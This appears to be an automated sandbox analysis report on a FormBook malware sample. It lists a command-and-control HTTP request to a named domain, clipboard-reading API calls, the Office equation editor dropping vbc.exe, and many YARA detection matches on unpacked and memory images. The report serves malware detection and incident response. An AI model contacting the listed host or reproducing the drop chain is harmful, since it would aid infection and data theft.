Source: global traffic HTTP traffic detected: GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.crystalsbyzoe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404E07

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe Jump to dropped file
Yara signature match
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research